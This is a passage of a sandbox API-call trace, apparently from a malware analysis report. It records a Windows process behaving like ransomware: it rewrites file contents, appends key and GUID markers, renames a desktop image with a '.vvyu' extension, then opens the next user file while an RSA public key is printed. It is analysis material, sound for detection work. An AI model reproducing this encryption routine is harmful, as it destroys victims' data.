GetLastError () returned 0x0 [0192.394] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.394] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.394] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.394] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.394] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10850) returned 0x2e96a68 [0192.395] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2ea72c0 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e951d0 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95218 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0192.396] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e912b0 [0192.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea79b0 [0192.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935e8 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c935d0 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.399] GetCurrentThreadId () returned 0x66c [0192.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e380 [0192.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.400] GetCurrentThreadId () returned 0x66c [0192.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0192.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0192.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935e8 [0192.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93648 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93660 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93600 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935d0 [0192.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e912b0 [0192.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea79b0 [0192.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0192.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea7bc8 [0192.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7bc8 | out: hHeap=0x620000) returned 1 [0192.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95218 | out: hHeap=0x620000) returned 1 [0192.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea72c0 | out: hHeap=0x620000) returned 1 [0192.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.417] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0x10845, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0x10845, lpOverlapped=0x0) returned 1 [0192.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.418] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1084a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.418] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.420] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.420] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.420] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.420] CloseHandle (hObject=0x568) returned 1 [0192.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0192.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e96a68 [0192.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.426] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\IjDhLcko.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\ijdhlcko.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\IjDhLcko.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ijdhlcko.jpg.vvyu")) returned 1 [0192.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.427] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.431] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f43bd50, ftCreationTime.dwHighDateTime=0x1d89ae1, ftLastAccessTime.dwLowDateTime=0x44e842d0, ftLastAccessTime.dwHighDateTime=0x1d89f28, ftLastWriteTime.dwLowDateTime=0x44e842d0, ftLastWriteTime.dwHighDateTime=0x1d89f28, nFileSizeHigh=0x0, nFileSizeLow=0xf347, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="itjgP.m4a", cAlternateFileName="")) returned 1 [0192.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95218 [0192.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0192.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95218 | out: hHeap=0x620000) returned 1 [0192.432] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\itjgP.m4a") returned=".m4a" [0192.432] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\itjgP.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\itjgp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.432] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=62279) returned 1 [0192.432] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.435] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xf321, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.435] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.437] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.437] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xf347, lpOverlapped=0x0) returned 1 [0192.438] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.438] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.438] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.438] CryptAcquireContextW (in: phProv=0x312fa50, 